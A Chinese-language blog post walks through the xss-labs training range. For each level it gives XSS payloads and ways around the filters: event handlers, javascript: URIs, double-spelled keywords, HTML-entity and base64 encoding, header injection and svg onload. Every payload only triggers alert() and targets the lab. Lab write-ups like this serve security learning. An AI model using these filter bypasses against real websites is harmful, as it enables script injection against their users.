<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="userq"><meta name="renderer" content="webkit"><meta name="copyright" content="userq"><meta name="keywords" content="MyBlog"><meta name="description" content="MyBlog"><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>xss · Mr.cheng's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="MyBlog" type="application/atom+xml">
</head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/cat.png"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">userq</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="//1768161086.github.io/" target="_black">friendA</a></span><span><a href="//github.com/" target="_black">friendB</a></span><span><a href="//github.com/" target="_black">friendC</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">Mr.cheng's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">xss</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2025-04-02</span></span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><h1 id="xss-labs靶场实战"><a href="#xss-labs靶场实战" class="headerlink" title="xss-labs靶场实战"></a>xss-labs靶场实战</h1><p><a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=xss-labs&spm=1001.2101.3001.7020">xss-labs</a>下载地址<a target="_blank" rel="noopener" href="https://github.com/do0dl3/xss-labs" title="https:&#x2F;&#x2F;github.com&#x2F;do0dl3&#x2F;xss-labs">GitHub - do0dl3&#x2F;xss-labs: xss 跨站漏洞平台</a></p>
<h2 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?name=&lt;script&gt;alert()&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h2 id="1-html实体转义"><a href="#1-html实体转义" class="headerlink" title="1.html实体转义"></a>1.html实体转义</h2><p>但是第二个没有，我们只需要闭合掉双引号即可，构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;  &lt;script&gt;alert()&lt;/script&gt;  &lt;&quot;</span><br></pre></td></tr></table></figure>

<h2 id="2-符号也被实体化"><a href="#2-符号也被实体化" class="headerlink" title="2.符号也被实体化"></a>2.符号也被实体化</h2><p>,但是htmlspecialchars函数只针对&lt;&gt;大于小于号进行html实体化，我们还可以利用其他方法进行xss注入，这里我们可以利用<strong>onfocus事件绕过</strong></p>
<p><code>onfocus事件在元素获得焦点时触发，最常与 &lt;input&gt;、&lt;select&gt; 和 &lt;a&gt; 标签一起使用，以上面图片的html标签&lt;input&gt;为例，&lt;input&gt;标签是有输入框的，简单来说，onfocus事件就是当输入框被点击的时候，就会触发myFunction()函数，然后我们再配合javascript伪协议来执行javascript代码</code></p>
<p>所以我们可以利用这个事件来绕过&lt;&gt;号的过滤已达到执行js的目的，构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onfocus=javascript:alert() &#x27;</span><br></pre></td></tr></table></figure>

<h2 id="3-双引号闭合"><a href="#3-双引号闭合" class="headerlink" title="3.双引号闭合"></a>3.双引号闭合</h2><p><input>标签，所以我们还能继续利用onfocus事件，构建payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot; onfocus=javascript:alert() &quot;</span><br></pre></td></tr></table></figure>

<h2 id="4-on被替换成了o-n"><a href="#4-on被替换成了o-n" class="headerlink" title="4.on被替换成了o_n"></a>4.on被替换成了o_n</h2><p>大小写无法来绕过过滤，使用href标签法</p>
<p>href属性的意思是 当标签<a>被点击的时候，就会触发执行转跳，上面是转跳到一个网站，我们还可以触发执行一段js代码</a></p>
<p>添加一个标签得闭合前面的标签，构建payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;a href=javascript:alert()&gt;xxx&lt;/a&gt; &lt;&quot;</span><br></pre></td></tr></table></figure>

<h2 id="5-大小写没有被过滤"><a href="#5-大小写没有被过滤" class="headerlink" title="5.大小写没有被过滤"></a>5.大小写没有被过滤</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;sCript&gt;alert()&lt;/sCript&gt; &lt;&quot;</span><br><span class="line">&quot; Onfocus=javascript:alert() &quot;</span><br><span class="line">&quot;&gt; &lt;a hRef=javascript:alert()&gt;x&lt;/a&gt; &lt;&quot;</span><br></pre></td></tr></table></figure>

<h2 id="6-禁用on，script，href"><a href="#6-禁用on，script，href" class="headerlink" title="6.禁用on，script，href"></a>6.禁用on，script，href</h2><p>所以这关主要是双拼写绕过，方法有很多，这里我们用href属性标签，构造play</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;a hrehreff=javasscriptcript:alert()&gt;x&lt;/a&gt; &lt;&quot;</span><br></pre></td></tr></table></figure>

<h2 id="7-滤掉src和data"><a href="#7-滤掉src和data" class="headerlink" title="7.滤掉src和data"></a>7.滤掉src和data</h2><ul>
<li><strong>src</strong>(source)是一个指向，可以大概理解跟href一样把，只是执行的内容不太一样</li>
<li><strong>data</strong>一般在<iframe>标签中用来配合date:text&#x2F;html（貌似解码的含义）</iframe></li>
</ul>
<p>试一下src这里配合<strong>onerror属性</strong>，插入一个img标签闭合掉双引号跟括号，构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;img src=&#x27;666&#x27; onerror=alert()&gt; &lt;&quot;</span><br></pre></td></tr></table></figure>

<p><code>onerror属性是指当图片加载不出来的时候触发js函数，以上面的代码为例，这里因为src指向的是值666，而不是图片的地址和base64编码啥的，就会导致触发alert函数</code></p>
<h3 id="img标签还有其他姿势"><a href="#img标签还有其他姿势" class="headerlink" title="img标签还有其他姿势"></a>img标签还有其他姿势</h3><h4 id="当鼠标移出图片的时候执行的属性onmouseout"><a href="#当鼠标移出图片的时候执行的属性onmouseout" class="headerlink" title="当鼠标移出图片的时候执行的属性onmouseout"></a>当鼠标移出图片的时候执行的属性<strong>onmouseout</strong></h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;img src=666 onmouseout=&quot;alert()&quot;&gt; &lt;&quot;</span><br></pre></td></tr></table></figure>

<h4 id="当鼠标移动到图片的时候执行的属性onmouseover"><a href="#当鼠标移动到图片的时候执行的属性onmouseover" class="headerlink" title="当鼠标移动到图片的时候执行的属性onmouseover"></a>当鼠标移动到图片的时候执行的属性<strong>onmouseover</strong></h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;img src=1 onmouseover=&quot;alert()&quot;&gt; &lt;&quot;</span><br></pre></td></tr></table></figure>

<p>再来看看data的，这里利用iframe标签，插入一个标签<strong>data:text&#x2F;html;base64,</strong> 将后面的内容进行base64解码，PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+进行base64解码后是<script>alert()</script></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;iframe src=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+&quot;&gt; &lt;&quot;</span><br></pre></td></tr></table></figure>

<h2 id="8-过滤双引号"><a href="#8-过滤双引号" class="headerlink" title="8.过滤双引号"></a>8.过滤双引号</h2><p>利用href的隐藏属性自动Unicode解码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#41; ==javascript:alert()</span><br></pre></td></tr></table></figure>

<h2 id="9-strpos绕过"><a href="#9-strpos绕过" class="headerlink" title="9.strpos绕过"></a>9.strpos绕过</h2><p>需要向传入的值里面添加http:&#x2F;&#x2F;并用注释符注释掉否则会执行不了无法弹窗，让函数strpos返回一个数字，构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#41;/* http:// */</span><br></pre></td></tr></table></figure>

<h2 id="10-过滤掉了号"><a href="#10-过滤掉了号" class="headerlink" title="10.过滤掉了&lt;&gt;号"></a>10.过滤掉了&lt;&gt;号</h2><p>用onfocus事件，因为这里输入框被隐藏了，需要添加type&#x3D;”text”，构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?t_sort=&quot; onfocus=javascript:alert() type=&quot;text</span><br></pre></td></tr></table></figure>

<p>构造一个http头</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Referer: &quot; onfocus=javascript:alert() type=&quot;text</span><br></pre></td></tr></table></figure>

<p>构造UA头</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot; onfocus=javascript:alert() type=&quot;text</span><br></pre></td></tr></table></figure>

<p>伪造cookie头</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot; onclick=alert() type=&quot;text </span><br></pre></td></tr></table></figure>

<h2 id="11-过滤JavaScript"><a href="#11-过滤JavaScript" class="headerlink" title="11.过滤JavaScript"></a>11.过滤JavaScript</h2><p>我们需通过<code>HTML</code>实体编码或<code>Unicode</code>绕过<br>因为浏览器会自动解码<code>HTML</code>实体或<code>Unicode</code>字符，最终执行原始代码。<br>构造<code>payload1</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">javascrip&amp;#x74;:alert(1)（`t`的十六进制编码，点击链接弹窗）</span><br><span class="line">构造payload2</span><br><span class="line">使用Unicode编码：</span><br><span class="line">javasc&amp;#x0072;ipt:alert(1)</span><br></pre></td></tr></table></figure>

<h2 id="12-过滤script标签"><a href="#12-过滤script标签" class="headerlink" title="12.过滤script标签"></a>12.过滤script标签</h2><p>但是可以包涵那些标签的东西比如<a>、<input>、img、<p>标签等等</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?src=&#x27;/level1.php?name=&lt;img src=1 onmouseover=alert()&gt;&#x27;</span><br></pre></td></tr></table></figure>

<p>当然也能用p标签，可以构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?src=&#x27;/level1.php?name=&lt;p onmousedown=alert()&gt;哈哈哈&lt;/p&gt;&#x27;</span><br></pre></td></tr></table></figure>

<h2 id="13-字母小写化-script替换成空格-最后将空格给实体化-给替换成了空格"><a href="#13-字母小写化-script替换成空格-最后将空格给实体化-给替换成了空格" class="headerlink" title="13.字母小写化,script替换成空格,最后将空格给实体化,&#x2F;给替换成了空格"></a>13.字母小写化,script替换成空格,最后将空格给实体化,&#x2F;给替换成了空格</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?keyword=&lt;svg%0Aonload=alert(1)&gt;</span><br></pre></td></tr></table></figure>

<h2 id="14-测试关键字"><a href="#14-测试关键字" class="headerlink" title="14.测试关键字"></a>14.测试关键字</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?arg01=&quot; &#x27; sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P &lt;sCriPt&gt; &lt;a hReF=javascript:alert()&gt;; &amp;arg02=&quot; &#x27; sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P &lt;sCriPt&gt; &lt;a hReF=javascript:alert()&gt;;</span><br></pre></td></tr></table></figure>

<p>将后端第十七关的代码（level17.php）指向的swf文件改为index.png</p>
<p>就有个embed标签的区域在啦，其实用不用swf文件都一样的，主要是区域，接着我们构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?arg02= onclick=alert()</span><br><span class="line">?arg02= onmousedown=alert()</span><br></pre></td></tr></table></figure>

<h2 id="15-实体化函数在无法闭合"><a href="#15-实体化函数在无法闭合" class="headerlink" title="15.实体化函数在无法闭合"></a>15.实体化函数在无法闭合</h2><p>往Flash里面插入一段js代码，然后手动执行嘛，构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?arg01=version&amp;arg02=&lt;a href=&quot;javascript:alert()&quot;&gt;here&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<h2 id="16-反编译"><a href="#16-反编译" class="headerlink" title="16.反编译"></a>16.反编译</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?arg01=id&amp;arg02=xss\&quot;))&#125;catch(e)&#123;alert(1)&#125;//%26width=123%26height=123</span><br><span class="line">?arg01=id&amp;arg02=xss\&quot;))&#125;catch(e)&#123;alert(/xss/)&#125;//%26width%26height</span><br></pre></td></tr></table></figure>


</a></p></article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://1768161086.github,io">userq</a></p><p> <span>Link:  </span><a href="http://1768161086.github,io/2025/04/02/xss/">http://1768161086.github,io/2025/04/02/xss/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="prevSlogan" href="/2025/04/05/sqlite/" title="SQLite 数据库注入总结"><span>< PreviousPost</span><br><span class="prevTitle">SQLite 数据库注入总结</span></a><a class="nextSlogan" href="/2025/04/02/Arjun%E6%9F%A5%E8%AF%A2%E5%8F%82%E6%95%B0/" title="Arjun查询参数"><span>NextPost ></span><br><span class="nextTitle">Arjun查询参数</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#xss-labs%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98"><span class="toc-number">1.</span> <span class="toc-text">xss-labs靶场实战</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#level-1"><span class="toc-number">1.1.</span> <span class="toc-text">level 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-html%E5%AE%9E%E4%BD%93%E8%BD%AC%E4%B9%89"><span class="toc-number">1.2.</span> <span class="toc-text">1.html实体转义</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E7%AC%A6%E5%8F%B7%E4%B9%9F%E8%A2%AB%E5%AE%9E%E4%BD%93%E5%8C%96"><span class="toc-number">1.3.</span> <span class="toc-text">2.符号也被实体化</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E5%8F%8C%E5%BC%95%E5%8F%B7%E9%97%AD%E5%90%88"><span class="toc-number">1.4.</span> <span class="toc-text">3.双引号闭合</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-on%E8%A2%AB%E6%9B%BF%E6%8D%A2%E6%88%90%E4%BA%86o-n"><span class="toc-number">1.5.</span> <span class="toc-text">4.on被替换成了o_n</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-%E5%A4%A7%E5%B0%8F%E5%86%99%E6%B2%A1%E6%9C%89%E8%A2%AB%E8%BF%87%E6%BB%A4"><span class="toc-number">1.6.</span> <span class="toc-text">5.大小写没有被过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-%E7%A6%81%E7%94%A8on%EF%BC%8Cscript%EF%BC%8Chref"><span class="toc-number">1.7.</span> <span class="toc-text">6.禁用on，script，href</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-%E6%BB%A4%E6%8E%89src%E5%92%8Cdata"><span class="toc-number">1.8.</span> <span class="toc-text">7.滤掉src和data</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#img%E6%A0%87%E7%AD%BE%E8%BF%98%E6%9C%89%E5%85%B6%E4%BB%96%E5%A7%BF%E5%8A%BF"><span class="toc-number">1.8.1.</span> <span class="toc-text">img标签还有其他姿势</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BD%93%E9%BC%A0%E6%A0%87%E7%A7%BB%E5%87%BA%E5%9B%BE%E7%89%87%E7%9A%84%E6%97%B6%E5%80%99%E6%89%A7%E8%A1%8C%E7%9A%84%E5%B1%9E%E6%80%A7onmouseout"><span class="toc-number">1.8.1.1.</span> <span class="toc-text">当鼠标移出图片的时候执行的属性onmouseout</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BD%93%E9%BC%A0%E6%A0%87%E7%A7%BB%E5%8A%A8%E5%88%B0%E5%9B%BE%E7%89%87%E7%9A%84%E6%97%B6%E5%80%99%E6%89%A7%E8%A1%8C%E7%9A%84%E5%B1%9E%E6%80%A7onmouseover"><span class="toc-number">1.8.1.2.</span> <span class="toc-text">当鼠标移动到图片的时候执行的属性onmouseover</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-%E8%BF%87%E6%BB%A4%E5%8F%8C%E5%BC%95%E5%8F%B7"><span class="toc-number">1.9.</span> <span class="toc-text">8.过滤双引号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-strpos%E7%BB%95%E8%BF%87"><span class="toc-number">1.10.</span> <span class="toc-text">9.strpos绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-%E8%BF%87%E6%BB%A4%E6%8E%89%E4%BA%86%E5%8F%B7"><span class="toc-number">1.11.</span> <span class="toc-text">10.过滤掉了&lt;&gt;号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-%E8%BF%87%E6%BB%A4JavaScript"><span class="toc-number">1.12.</span> <span class="toc-text">11.过滤JavaScript</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12-%E8%BF%87%E6%BB%A4script%E6%A0%87%E7%AD%BE"><span class="toc-number">1.13.</span> <span class="toc-text">12.过滤script标签</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#13-%E5%AD%97%E6%AF%8D%E5%B0%8F%E5%86%99%E5%8C%96-script%E6%9B%BF%E6%8D%A2%E6%88%90%E7%A9%BA%E6%A0%BC-%E6%9C%80%E5%90%8E%E5%B0%86%E7%A9%BA%E6%A0%BC%E7%BB%99%E5%AE%9E%E4%BD%93%E5%8C%96-%E7%BB%99%E6%9B%BF%E6%8D%A2%E6%88%90%E4%BA%86%E7%A9%BA%E6%A0%BC"><span class="toc-number">1.14.</span> <span class="toc-text">13.字母小写化,script替换成空格,最后将空格给实体化,&#x2F;给替换成了空格</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#14-%E6%B5%8B%E8%AF%95%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">1.15.</span> <span class="toc-text">14.测试关键字</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#15-%E5%AE%9E%E4%BD%93%E5%8C%96%E5%87%BD%E6%95%B0%E5%9C%A8%E6%97%A0%E6%B3%95%E9%97%AD%E5%90%88"><span class="toc-number">1.16.</span> <span class="toc-text">15.实体化函数在无法闭合</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#16-%E5%8F%8D%E7%BC%96%E8%AF%91"><span class="toc-number">1.17.</span> <span class="toc-text">16.反编译</span></a></li></ol></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>